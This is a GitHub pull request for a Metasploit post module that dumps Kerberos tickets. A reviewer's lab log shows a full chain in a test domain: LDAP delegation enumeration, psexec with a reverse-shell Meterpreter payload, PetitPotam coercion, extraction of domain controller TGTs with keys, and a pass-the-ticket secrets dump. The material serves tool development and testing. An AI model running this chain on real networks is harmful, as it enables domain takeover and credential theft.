Add the manage/kerberos_tickets post module #18488
Merged
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Also use HeapAlloc so we're not leaking entire pages.
zeroSteiner
commented
Oct 25, 2023
Comment on lines
+222
to
+226
| ### Using The Ticket | ||
| Now that at TGT for the domain controller has been obtained, it can be used in a Pass-The-Ticket style attack whereby | ||
| the attacker uses it to authenticate to the target. The `auxiliary/gather/windows_secrets_dump` module is a good one to | ||
| use for this purpose as it will yield additional accounts while avoiding running any kind of payload on the domain | ||
| controller. |
There was a problem hiding this comment.
Note that auxiliary/gather/windows_secrets_dump won't work until #18419 is landed.
adfoster-r7
reviewed
Oct 26, 2023
jheysel-r7
reviewed
Oct 26, 2023
This updates railgun to accept BinData::Structs in key locations of railgun for convenience.
Add definitions for ConvertSidToStringSid and fix the data type of the ThreadHandle parameter.
This will cause railgun to use the pointer as is it were defined as an LPVOID parameter type. This is useful in cases where the contents are already in the target's memory.
zeroSteiner
force-pushed
the
feat/mod/kerberos/dump-tickets
branch
from
c0f8f5b
to
7b76cc0
Compare
jheysel-r7
reviewed
Dec 7, 2023
There was a problem hiding this comment.
Great work @zeroSteiner. Thanks for the detailed Attack Workflow, it made testing nice and easy to follow. The module along with the PR's many enhancements seem to be working as expected.
I thought I'd include my testing output from the entire workflow incase it helps future travelers:
1. Identify a target computer account configured with unconstrained delegation.
msf6 auxiliary(gather/ldap_query) > options
Module options (auxiliary/gather/ldap_query):
Name Current Setting Required Description
---- --------------- -------- -----------
BASE_DN no LDAP base DN if you already have it
DOMAIN kerberos.issue no The domain to authenticate to
OUTPUT_FORMAT table yes The output format to use (Accepted: csv, table, json)
PASSWORD N0tpassword! no The password to authenticate with
RHOSTS 172.16.199.200 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 389 yes The target port
SSL false no Enable SSL on the LDAP connection
USERNAME KERBEROSAdministrator no The username to authenticate with
When ACTION is RUN_SINGLE_QUERY:
Name Current Setting Required Description
---- --------------- -------- -----------
QUERY_ATTRIBUTES no Comma seperated list of attributes to retrieve from the server
QUERY_FILTER no Filter to send to the target LDAP server to perform the query
When ACTION is RUN_QUERY_FILE:
Name Current Setting Required Description
---- --------------- -------- -----------
QUERY_FILE_PATH no Path to the JSON or YAML file to load and run queries from
Auxiliary action:
Name Description
---- -----------
ENUM_UNCONSTRAINED_DELEGATION Dump info about all known objects that allow unconstrained delegation.
View the full module info with the info, or info -d command.
msf6 auxiliary(gather/ldap_query) > set username KERBEROS\\Administrator
username => KERBEROS\Administrator
msf6 auxiliary(gather/ldap_query) > run
[*] Running module against 172.16.199.200
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.199.200:389 Getting root DSE
[+] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
[+] 172.16.199.200:389 Discovered schema DN: DC=kerberos,DC=issue
CN=MSF CN=Computers DC=kerberos DC=issue
========================================
Name Attributes
---- ----------
cn MSF
objectcategory CN=Computer,CN=Schema,CN=Configuration,DC=kerberos,DC=issue
samaccountname MSF$
CN=DC2 OU=Domain Controllers DC=kerberos DC=issue
=================================================
Name Attributes
---- ----------
cn DC2
objectcategory CN=Computer,CN=Schema,CN=Configuration,DC=kerberos,DC=issue
samaccountname DC2$
[*] Query returned 2 results.
[*] Auxiliary module execution completed
Two potential unconstrained delegation targets, isolate by determining which one is the domain controller:
msf6 auxiliary(gather/ldap_query) > set action ENUM_DOMAIN_CONTROLLERS
action => ENUM_DOMAIN_CONTROLLERS
msf6 auxiliary(gather/ldap_query) > runb
[-] Unknown command: runb
msf6 auxiliary(gather/ldap_query) > run
[*] Running module against 172.16.199.200
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.199.200:389 Getting root DSE
[+] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
[+] 172.16.199.200:389 Discovered schema DN: DC=kerberos,DC=issue
CN=DC2 OU=Domain Controllers DC=kerberos DC=issue
=================================================
Name Attributes
---- ----------
distinguishedname CN=DC2,OU=Domain Controllers,DC=kerberos,DC=issue
dnshostname dc2.kerberos.issue
name DC2
operatingsystem Windows Server 2019 Standard
operatingsystemversion 10.0 (17763)
[*] Query returned 1 result.
[*] Auxiliary module execution completed
2. Compromise that target computer account to open a Meterpreter session with administrative privileges (SYSTEM works).
Get a session using psexec:
msf6 auxiliary(gather/ldap_query) > set rhosts 172.16.199.134
rhosts => 172.16.199.134
msf6 exploit(windows/smb/psexec) > set SMBDomain kerberos.issue
SMBDomain => kerberos.issue
msf6 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf6 exploit(windows/smb/psexec) > set smbpass N0tpassword!
smbpass => N0tpassword!
msf6 exploit(windows/smb/psexec) > options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.16.199.134 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain kerberos.issue no The Windows domain to use for authentication
SMBPass N0tpassword! no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBUser administrator no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.199.158 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 172.16.199.158:4444
[*] 172.16.199.134:445 - Connecting to the server...
[*] 172.16.199.134:445 - Authenticating to 172.16.199.134:445|kerberos.issue as user 'administrator'...
[*] 172.16.199.134:445 - Selecting PowerShell target
[*] 172.16.199.134:445 - Executing the payload...
[+] 172.16.199.134:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 172.16.199.134
[*] Meterpreter session 1 opened (172.16.199.158:4444 -> 172.16.199.134:55301) at 2023-12-07 12:38:39 -0900
meterpreter > bg
[*] Backgrounding session 1...
3. Coerce authentication to the compromised target from a domain controller.
Now use petitpotam to do some coercing
msf6 auxiliary(scanner/dcerpc/petitpotam) > set LISTENER msf.kerberos.issue
LISTENER => msf.kerberos.issue
msf6 auxiliary(scanner/dcerpc/petitpotam) > set smbuser administrator
smbuser => administrator
msf6 auxiliary(scanner/dcerpc/petitpotam) > set smbpass N0tpassword!
smbpass => N0tpassword!
msf6 auxiliary(scanner/dcerpc/petitpotam) > set rhosts 172.16.199.200
rhosts => 172.16.199.200
msf6 auxiliary(scanner/dcerpc/petitpotam) > run
[+] 172.16.199.200:445 - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
[*] 172.16.199.200:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
4. Dump the Kerberos tickets from the compromised targets to obtain a TGT from the domain controller's computer account.
msf6 post(windows/manage/kerberos_tickets) > set session -1
session => -1
msf6 post(windows/manage/kerberos_tickets) > set SERVICE krbtgt/*
SERVICE => krbtgt/*
msf6 post(windows/manage/kerberos_tickets) > run
[*] LSA Handle: 0x085d16f8
[*] LogonSession LUID: 0x00023eaff
[*] User: KERBEROS\Administrator
[*] Session: 1
[*] AuthenticationPackage: Kerberos
[*] LogonType: Interactive (2)
[*] LogonTime: 2023-12-07 08:26:47 -0900
[*] Ticket[0]
[*] TGT MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20231207124539_default_172.16.199.200_mit.kerberos.cca_080966.bin
Primary Principal: Administrator@KERBEROS.ISSUE
Ccache version: 4
Creds: 1
Credential[0]:
Server: krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE
Client: Administrator@KERBEROS.ISSUE
Ticket etype: 18 (AES256)
Key: bc8048e65bffa4cbb90acbe9218a75a3f9770a60075c2a1bcca3a16f67a4d792
Subkey: false
Ticket Length: 1118
Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
Addresses: 0
Authdatas: 0
Times:
Auth time: 1969-12-31 16:00:00 -0800
Start time: 2023-12-07 12:23:37 -0900
End time: 2023-12-07 22:23:37 -0900
Renew Till: 2023-12-14 12:23:37 -0900
Ticket:
Ticket Version Number: 5
Realm: KERBEROS.ISSUE
Server Name: krbtgt/KERBEROS.ISSUE
Encrypted Ticket Part:
Ticket etype: 18 (AES256)
Key Version Number: 2
Cipher:
gxGRn7kI3i9bTGTi/GS+wKinv+2bjTjoq6HweT6TgZ79trmWMdNRrPWf6MvuQHgNca/A7FBgEYZ3K/1I3CMJUsLjKaps3N7L1JtEano5rMwzOTpDnwzCx9viMQTV2Z7n2Uk/AqFltkJMShYGUYfkdsuo4fQaNjd7Vkwhp6n97pVExNZb1RjL6rDqpDw+90nMuH64+W9V6PmpSx+V9csPZ/OmEW+TgqpNASVpJ/6btj/DyAPL7RyVNbN3qR5fLz+bvv94CSX8pKZfvqLJjBLS6VUJPHHAJgsu6aW7NTbAPBFV3uF2izpHiFLdqgHiOPkL4gif7uiazV0E8PF/jTdvWZ9wvpCTFrPikOKxvvI+c7OYBKsBBMDcRylsUtTJo80cmAhNIixuXNYmgDpxy+Shm8Z1FSD+tZ2jH3dwlvzUJerIz8txkuHcgybplBj7jGdRaebkvb01aHZB9FYqMT9StoHnNKg3XFHnqE18WvPko4EiiZSGMobkHoPNWtXD1aaOpjgJHmZFPaAh/0Z43Z4qvyshj9vxZNEsOaftGjkC3PYNTEznhd/MKoQ/zLvk49hN7OEDxW0kUDrIUYVkBzbUS34uzt8gddJ6O1YFOkeirNy3/A/XYXG5Trt6nJf+IN+imMG1sT+BYCkHLteQpsVE2N6s0yjZAOQtVmc8Ym9g7nBfbgBmOHhM8xDQUx3CBv0/19NP8lx41cL+/9X6R0wueJCw4vuH91GLWkfMenEhPD6c3bGWTvB1AHaLAtplBO6nZiDcivpJluXFepDDZ51bRI0imCtIEG3/DF1uYjA/bWJqTWDlhxmjx0wO3JBALdBPNxpQcRHkl/1q3h3zsZUO9CbcWTDJ3R3hwKU6jG7eJwmrqlcAi4ahfwhVAV9JED1pzEevREMq6e+V1etxGvinmxqdVNrm8xVY5MXWHXtokABBHM6Su+mvFmZWRnUE4LhT5oQ9pEdhhOEikMyu25VCwlTErjgvl70rYMf46+2J7ZPGj5JyJ23x1H4rRK2+tisyAnaO5EVPcdAFgelBCfkm/21r/Wg0N8MeMWGOoCOQCi9IR5tW5i/MG9B3FBxDNkSNbo6QImw/fpH27k7zdrBVA3IH0KL/YfARg0GULkZCiRNZMFEwPU7BPL9whHaY9mTs/H4aNGSj8d8oPffulud5lamkrGdzJBVT9TVykx3BQN9NSe4wvvdDyxU6tZfMMuJ0RJC+pZPWT9c5X2L8lyLv3cfidhvU8GJAN1LVuFrcwvf9074guG1/sRFoU6DuOJfaOgnA4etZIjzHytSQwO4yN7yxKU4MIrVf4C20/FxF8+MTwVqBHEl5cA1FgAz8WIXRRBwkNCEXmyohfsMGgW4fNA==
[*] LogonSession LUID: 0x00002564c
[*] User: NT Service\SQLTELEMETRY$VEEAMSQL2016
[*] Session: 0
[*] AuthenticationPackage: Negotiate
[*] LogonType: Service (5)
[*] LogonTime: 2023-12-07 08:15:36 -0900
[*] LogonSession LUID: 0x0000003e5
[*] User: NT AUTHORITY\LOCAL SERVICE
[*] Session: 0
[*] AuthenticationPackage: Negotiate
[*] LogonType: Service (5)
[*] LogonTime: 2023-12-07 08:15:29 -0900
[*] LogonSession LUID: 0x000012e7b
[*] User: Window Manager\DWM-1
[*] Session: 1
[*] AuthenticationPackage: Negotiate
[*] LogonType: Interactive (2)
[*] LogonTime: 2023-12-07 08:15:29 -0900
[*] LogonSession LUID: 0x000012e22
[*] User: Window Manager\DWM-1
[*] Session: 1
[*] AuthenticationPackage: Negotiate
[*] LogonType: Interactive (2)
[*] LogonTime: 2023-12-07 08:15:29 -0900
[*] LogonSession LUID: 0x0000003e4
[*] User: KERBEROS\MSF$
[*] Session: 0
[*] AuthenticationPackage: Negotiate
[*] LogonType: Service (5)
[*] LogonTime: 2023-12-07 08:15:28 -0900
[*] Ticket[0]
[*] TGT MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20231207124543_default_172.16.199.200_mit.kerberos.cca_959988.bin
Primary Principal: MSF$@KERBEROS.ISSUE
Ccache version: 4
Creds: 1
Credential[0]:
Server: krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE
Client: MSF$@KERBEROS.ISSUE
Ticket etype: 18 (AES256)
Key: 0b144bd8116664f004c0dee513f9f28bfe907e16896b02545113b1dbca582e3b
Subkey: false
Ticket Length: 1021
Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
Addresses: 0
Authdatas: 0
Times:
Auth time: 1969-12-31 16:00:00 -0800
Start time: 2023-12-07 08:15:27 -0900
End time: 2023-12-07 18:15:27 -0900
Renew Till: 2023-12-14 08:15:27 -0900
Ticket:
Ticket Version Number: 5
Realm: KERBEROS.ISSUE
Server Name: krbtgt/KERBEROS.ISSUE
Encrypted Ticket Part:
Ticket etype: 18 (AES256)
Key Version Number: 2
Cipher:
Fgegz4L4vGQp1ydH0eL8M0l7FySPWPJTa7ncOPKM99xeNWL0xIxgzQRYHJS2I13FAm+nznWURBqonLlfq3hNzQ14fA+suZsxyGwnmAdvlaaAGPDQABHu6hT/NsQb9PGS1xt8QOoEvP8vjJiFAhLLURn7MHV/YhB5EZDAZo6dzMrEwmL6wcJ1tY71r0/t6VJrkj+sx81tWfVzQccJ15lZYJZyfQQa0pTkMp37Bheb1p5sX3X9kUBmo5zNT039AjGrZYPq73tIEG43p2x22W/4d1jN7KUzbm866MDpRipxmxvD58dl7UZYEmNViqsIi9+TF4eYEBOxf2p26K/kod274u64R+KN98WW1Y65wyjTlNLz4NaeAJrTBKEcIEE3LnZDi4+QLEj8dI9avMXfemeO/lgfsLUplr8/3kqf1to80I6fTBUt5C48FbeI07gTdOyhQNdKnvn85IwuzB3yjne2wo6lfUggtPg+LiyNsvNWep+PDe26ZdujizcY8OPbQvjxBQcgGijc2fJwGl+gI5nMrzFBiJnSSklhdQHpiOpkeELMFZiaJZJQeYB9MzW5zkByVOhgnplkS1seuHloMvG8Ob579+juu0Ff/X3Wih18Cb0XNfkSRHBJWeM5TrsNZ731/MqRTJyS77ZBs3T7cKMyRQ13jEb6FAncE6KTn4zfiiZft1Nb8Iq6LaWsLWdJg9AYtsN3cYJ8DtnU0ntGZBietOVGeSo99wPwXZVrKC5lPxVUI6z6hslVb76aib304OgiYuE23hie/dOC5zBkzYguQVmPHx799VnEz6vyzT8MIRK5k33jhlTCG/ph9lmUZ9XDUQ2hN4CKFOvBbKlZvJ23c6+8kSp3EZ9wEhJZAUdnxuQtCNN/CFE2f/uO0Gw0Iu7D6MgcV6JTsBZtdKbI2i6lsFjGu2s3OCo4Ql5W/voTdQ+aGT1VrakUOsAhhq1dqhnjPlaBWoSLjBUJsMhBn/MgcL5IvBSC2qb1qELx2h2gnUIdmfZL8zq620OLd8ifJpO/j4iPzfXlheD2Br+OIXgKH/SliiOmEaODOObCsUKdazz0UfL/2zYbEMA0z9tXSPaL1gH0pMQy54uVM6D5Zfz3a+d1Io7scI0qn2XiEYhfd5qeBD32fjfzMntRp7onm3s67RsjjQZp3TBlI2a/4WcvyysdeUhQLInQrBR/7b0tGbNM+xm/uzvIIkDZ09SXpcyU6hWQF5zxIAiGT60UFka/
[*] Ticket[1]
[*] TGT MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20231207124543_default_172.16.199.200_mit.kerberos.cca_681743.bin
Primary Principal: MSF$@KERBEROS.ISSUE
Ccache version: 4
Creds: 1
Credential[0]:
Server: krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE
Client: MSF$@KERBEROS.ISSUE
Ticket etype: 18 (AES256)
Key: 0b144bd8116664f004c0dee513f9f28bfe907e16896b02545113b1dbca582e3b
Subkey: false
Ticket Length: 1021
Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
Addresses: 0
Authdatas: 0
Times:
Auth time: 1969-12-31 16:00:00 -0800
Start time: 2023-12-07 08:15:27 -0900
End time: 2023-12-07 18:15:27 -0900
Renew Till: 2023-12-14 08:15:27 -0900
Ticket:
Ticket Version Number: 5
Realm: KERBEROS.ISSUE
Server Name: krbtgt/KERBEROS.ISSUE
Encrypted Ticket Part:
Ticket etype: 18 (AES256)
Key Version Number: 2
Cipher:
Fgegz4L4vGQp1ydH0eL8M0l7FySPWPJTa7ncOPKM99xeNWL0xIxgzQRYHJS2I13FAm+nznWURBqonLlfq3hNzQ14fA+suZsxyGwnmAdvlaaAGPDQABHu6hT/NsQb9PGS1xt8QOoEvP8vjJiFAhLLURn7MHV/YhB5EZDAZo6dzMrEwmL6wcJ1tY71r0/t6VJrkj+sx81tWfVzQccJ15lZYJZyfQQa0pTkMp37Bheb1p5sX3X9kUBmo5zNT039AjGrZYPq73tIEG43p2x22W/4d1jN7KUzbm866MDpRipxmxvD58dl7UZYEmNViqsIi9+TF4eYEBOxf2p26K/kod274u64R+KN98WW1Y65wyjTlNLz4NaeAJrTBKEcIEE3LnZDi4+QLEj8dI9avMXfemeO/lgfsLUplr8/3kqf1to80I6fTBUt5C48FbeI07gTdOyhQNdKnvn85IwuzB3yjne2wo6lfUggtPg+LiyNsvNWep+PDe26ZdujizcY8OPbQvjxBQcgGijc2fJwGl+gI5nMrzFBiJnSSklhdQHpiOpkeELMFZiaJZJQeYB9MzW5zkByVOhgnplkS1seuHloMvG8Ob579+juu0Ff/X3Wih18Cb0XNfkSRHBJWeM5TrsNZ731/MqRTJyS77ZBs3T7cKMyRQ13jEb6FAncE6KTn4zfiiZft1Nb8Iq6LaWsLWdJg9AYtsN3cYJ8DtnU0ntGZBietOVGeSo99wPwXZVrKC5lPxVUI6z6hslVb76aib304OgiYuE23hie/dOC5zBkzYguQVmPHx799VnEz6vyzT8MIRK5k33jhlTCG/ph9lmUZ9XDUQ2hN4CKFOvBbKlZvJ23c6+8kSp3EZ9wEhJZAUdnxuQtCNN/CFE2f/uO0Gw0Iu7D6MgcV6JTsBZtdKbI2i6lsFjGu2s3OCo4Ql5W/voTdQ+aGT1VrakUOsAhhq1dqhnjPlaBWoSLjBUJsMhBn/MgcL5IvBSC2qb1qELx2h2gnUIdmfZL8zq620OLd8ifJpO/j4iPzfXlheD2Br+OIXgKH/SliiOmEaODOObCsUKdazz0UfL/2zYbEMA0z9tXSPaL1gH0pMQy54uVM6D5Zfz3a+d1Io7scI0qn2XiEYhfd5qeBD32fjfzMntRp7onm3s67RsjjQZp3TBlI2a/4WcvyysdeUhQLInQrBR/7b0tGbNM+xm/uzvIIkDZ09SXpcyU6hWQF5zxIAiGT60UFka/
[*] LogonSession LUID: 0x00000ce7b
[*] User: Font Driver Host\UMFD-0
[*] Session: 0
[*] AuthenticationPackage: Negotiate
[*] LogonType: Interactive (2)
[*] LogonTime: 2023-12-07 08:15:28 -0900
[*] LogonSession LUID: 0x00000ce28
[*] User: Font Driver Host\UMFD-1
[*] Session: 1
[*] AuthenticationPackage: Negotiate
[*] LogonType: Interactive (2)
[*] LogonTime: 2023-12-07 08:15:28 -0900
[*] LogonSession LUID: 0x00000c35f
[*] User: \
[*] Session: 0
[*] AuthenticationPackage: NTLM
[*] LogonType: UndefinedLogonType (0)
[*] LogonTime: 2023-12-07 08:15:28 -0900
[-] Failed to call the authentication package. LsaCallAuthenticationPackage authentication package failed with: (0x00000520) ERROR_NO_SUCH_LOGON_SESSION: A specified logon session does not exist. It may already have been terminated.
[*] LogonSession LUID: 0x0000003e7
[*] User: KERBEROS\MSF$
[*] Session: 0
[*] AuthenticationPackage: Negotiate
[*] LogonType: UndefinedLogonType (0)
[*] LogonTime: 2023-12-07 08:15:27 -0900
[*] Ticket[0]
[*] TGT MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20231207124546_default_172.16.199.200_mit.kerberos.cca_652150.bin
Primary Principal: MSF$@KERBEROS.ISSUE
Ccache version: 4
Creds: 1
Credential[0]:
Server: krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE
Client: MSF$@KERBEROS.ISSUE
Ticket etype: 18 (AES256)
Key: 7cf6c1f0f806ff124763bf2aacf7570bde54159b9476b890030d5072d9fe76a4
Subkey: false
Ticket Length: 1021
Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
Addresses: 0
Authdatas: 0
Times:
Auth time: 1969-12-31 16:00:00 -0800
Start time: 2023-12-07 08:15:27 -0900
End time: 2023-12-07 18:15:27 -0900
Renew Till: 2023-12-14 08:15:27 -0900
Ticket:
Ticket Version Number: 5
Realm: KERBEROS.ISSUE
Server Name: krbtgt/KERBEROS.ISSUE
Encrypted Ticket Part:
Ticket etype: 18 (AES256)
Key Version Number: 2
Cipher:
p9WLJTbPQqJSKKs9NY+dAZqq+EdgyBngvnBQMvDDunkqz+02TiFevhHCUUUWBWfCjv+/+w5H4Oai4+Nj57Pr7qWD2CP6TOM+7aI53UUBWLSCHz82zCmlmRLBD+zeqvf+fqCcNICI2L0HLREXFSPCO6J8Xva2cVUgHbkhTPqTLij9HbfaXm1OpoQcm/3Xu9iPOPwnnmV9FLBScwWX2G0o43cVhZOYYoKjZL/c3axITEBzcoZ6opc1Rsd2IpqWqquelFgm8xGJUKs8t81yI0cRT1iqd13LTdVE3ISfVHyWlU2W+IIqQf7B1Vzq8Y3c00MD/DQYIipl6JM5TpNAsLz0Bhnfpn2dQ55SKuYlukQ5cvSbmIweZrdZ4bgTx7EQCd/GH7puKdZhoPLtp6lGUXxoAmyzz2+3fjyEFjaWNL0VGUamqk8RAg1YvLDxYqRGBC7mtBMl46k0CTzrVpoEnx55adMrnSu3X0w+QkZ0Udt0MoyuLPihnLHeB+UaoMI9PW8EZI6fQVcQTupznu1TLaaGKE4ATGAmpaXopEPBxt7ZZsLLFg50sh7ouDlw1dQE1HwYG5KvVbtELCr0hFXf5mMpSQeAhIbgGUUrFo1GEuRs7gwRQ1c4pMB5mBPbsmgkLUeb5PHex7QaGpExwpE7Ckfsxkn3GpcsQHP97wnXOA8CgSN6fetyazoKNE869P13reJ11x+XgJ/ICcqIds9+PCxLL5AqRJPJH/1Actlh4F2vik1dlL53+DqtNcOFUYcUYke1kc2TtTu15MvJ4Jr2qUaVz2U5TarDCxS3sv9p718MyKahDAiiv12tbag5iyOzoSjXeiXnlktJ5aytHeuaxXT3nXdfevrhczT3omxE0rlCGed4WEtTugyFJX3NwuSGJGkZmowEBN47W0mfrP07Q/67+dp9CvZaySwAKH31N+DFFjum5xuWETCa/Op+aml8rLQFAHOjjRvVjNXpsJkeas3U6juKbJzJ3366iczrPV1wMe89W4+wjke3MZPXgWsDP6BZYUDFRPpKLm4eSxl8yyirH/bwN/fzhtes7/Nq2Ucq6sISxHxwHhMf5hGPxnw31m/GiVf2V+Rh/rbzxHVrxOizWzwV7tfvbqNCgww7aEIJ8xVXY8JeS4mSAYW4F1ZjNGpQ17IK5hm/7srcT0YwZ/WQARRT2tO5DtFp9L/D3SX0eQdfWt+KH2F2MOH1l9Qf4AwSBt6L3WLCXXqkY+16D8Dv
[*] Ticket[1]
[*] TGT MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20231207124547_default_172.16.199.200_mit.kerberos.cca_235052.bin
Primary Principal: MSF$@KERBEROS.ISSUE
Ccache version: 4
Creds: 1
Credential[0]:
Server: krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE
Client: MSF$@KERBEROS.ISSUE
Ticket etype: 18 (AES256)
Key: 7cf6c1f0f806ff124763bf2aacf7570bde54159b9476b890030d5072d9fe76a4
Subkey: false
Ticket Length: 1021
Ticket Flags: 0x40e10000 (FORWARDABLE, RENEWABLE, INITIAL, PRE_AUTHENT, CANONICALIZE)
Addresses: 0
Authdatas: 0
Times:
Auth time: 1969-12-31 16:00:00 -0800
Start time: 2023-12-07 08:15:27 -0900
End time: 2023-12-07 18:15:27 -0900
Renew Till: 2023-12-14 08:15:27 -0900
Ticket:
Ticket Version Number: 5
Realm: KERBEROS.ISSUE
Server Name: krbtgt/KERBEROS.ISSUE
Encrypted Ticket Part:
Ticket etype: 18 (AES256)
Key Version Number: 2
Cipher:
p9WLJTbPQqJSKKs9NY+dAZqq+EdgyBngvnBQMvDDunkqz+02TiFevhHCUUUWBWfCjv+/+w5H4Oai4+Nj57Pr7qWD2CP6TOM+7aI53UUBWLSCHz82zCmlmRLBD+zeqvf+fqCcNICI2L0HLREXFSPCO6J8Xva2cVUgHbkhTPqTLij9HbfaXm1OpoQcm/3Xu9iPOPwnnmV9FLBScwWX2G0o43cVhZOYYoKjZL/c3axITEBzcoZ6opc1Rsd2IpqWqquelFgm8xGJUKs8t81yI0cRT1iqd13LTdVE3ISfVHyWlU2W+IIqQf7B1Vzq8Y3c00MD/DQYIipl6JM5TpNAsLz0Bhnfpn2dQ55SKuYlukQ5cvSbmIweZrdZ4bgTx7EQCd/GH7puKdZhoPLtp6lGUXxoAmyzz2+3fjyEFjaWNL0VGUamqk8RAg1YvLDxYqRGBC7mtBMl46k0CTzrVpoEnx55adMrnSu3X0w+QkZ0Udt0MoyuLPihnLHeB+UaoMI9PW8EZI6fQVcQTupznu1TLaaGKE4ATGAmpaXopEPBxt7ZZsLLFg50sh7ouDlw1dQE1HwYG5KvVbtELCr0hFXf5mMpSQeAhIbgGUUrFo1GEuRs7gwRQ1c4pMB5mBPbsmgkLUeb5PHex7QaGpExwpE7Ckfsxkn3GpcsQHP97wnXOA8CgSN6fetyazoKNE869P13reJ11x+XgJ/ICcqIds9+PCxLL5AqRJPJH/1Actlh4F2vik1dlL53+DqtNcOFUYcUYke1kc2TtTu15MvJ4Jr2qUaVz2U5TarDCxS3sv9p718MyKahDAiiv12tbag5iyOzoSjXeiXnlktJ5aytHeuaxXT3nXdfevrhczT3omxE0rlCGed4WEtTugyFJX3NwuSGJGkZmowEBN47W0mfrP07Q/67+dp9CvZaySwAKH31N+DFFjum5xuWETCa/Op+aml8rLQFAHOjjRvVjNXpsJkeas3U6juKbJzJ3366iczrPV1wMe89W4+wjke3MZPXgWsDP6BZYUDFRPpKLm4eSxl8yyirH/bwN/fzhtes7/Nq2Ucq6sISxHxwHhMf5hGPxnw31m/GiVf2V+Rh/rbzxHVrxOizWzwV7tfvbqNCgww7aEIJ8xVXY8JeS4mSAYW4F1ZjNGpQ17IK5hm/7srcT0YwZ/WQARRT2tO5DtFp9L/D3SX0eQdfWt+KH2F2MOH1l9Qf4AwSBt6L3WLCXXqkY+16D8Dv
[*] Post module execution completed
Look at all those tickets! (most of them are old, should have cleaned my klist before starting, though the one at the bottom is the one we just got.)
msf6 post(windows/manage/kerberos_tickets) > klist
Kerberos Cache
==============
id host principal sname issued status path
-- ---- --------- ----- ------ ------ ----
100 Administrator@KERBEROS.ISSUE krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE 2023-11-28 06:39:38 -0900 active /home/msfuser/.msf4/loot/20231128063938_default_unknown_mit.kerberos.cca_413255.bin
101 172.16.199.200 Administrator@KERBEROS.ISSUE cifs/dc2.kerberos.issue@KERBEROS.ISSUE 2023-11-28 06:43:28 -0900 >>expired<< /home/msfuser/.msf4/loot/20231128064329_default_172.16.199.200_mit.kerberos.cca_461032.bin
103 172.16.199.200 MSF$@KERBEROS.ISSUE krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE 2023-12-07 08:15:27 -0900 active /home/msfuser/.msf4/loot/20231207124543_default_172.16.199.200_mit.kerberos.cca_959988.bin
104 172.16.199.200 MSF$@KERBEROS.ISSUE krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE 2023-12-07 08:15:27 -0900 active /home/msfuser/.msf4/loot/20231207124543_default_172.16.199.200_mit.kerberos.cca_681743.bin
105 172.16.199.200 MSF$@KERBEROS.ISSUE krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE 2023-12-07 08:15:27 -0900 active /home/msfuser/.msf4/loot/20231207124546_default_172.16.199.200_mit.kerberos.cca_652150.bin
106 172.16.199.200 MSF$@KERBEROS.ISSUE krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE 2023-12-07 08:15:27 -0900 active /home/msfuser/.msf4/loot/20231207124547_default_172.16.199.200_mit.kerberos.cca_235052.bin
102 172.16.199.200 Administrator@KERBEROS.ISSUE krbtgt/KERBEROS.ISSUE@KERBEROS.ISSUE 2023-12-07 12:23:37 -0900 active /home/msfuser/.msf4/loot/20231207124539_default_172.16.199.200_mit.kerberos.cca_080966.bin
5. Use the TGT to authenticate to the domain controller as itself
Test the ticket we just obtained with auxiliary/gather/windows_secrets_dump:
msf6 post(windows/manage/kerberos_tickets) > use auxiliary/gather/windows_secrets_dump
msf6 auxiliary(gather/windows_secrets_dump) > set rhosts 172.16.199.200
rhosts => 172.16.199.200
msf6 auxiliary(gather/windows_secrets_dump) > set SMBDomain kerberos.issue
SMBDomain => kerberos.issue
msf6 auxiliary(gather/windows_secrets_dump) > set SMB::Auth kerberos
SMB::Auth => kerberos
msf6 auxiliary(gather/windows_secrets_dump) > set SMB::Rhostname dc2.kerberos.issue
SMB::Rhostname => dc2.kerberos.issue
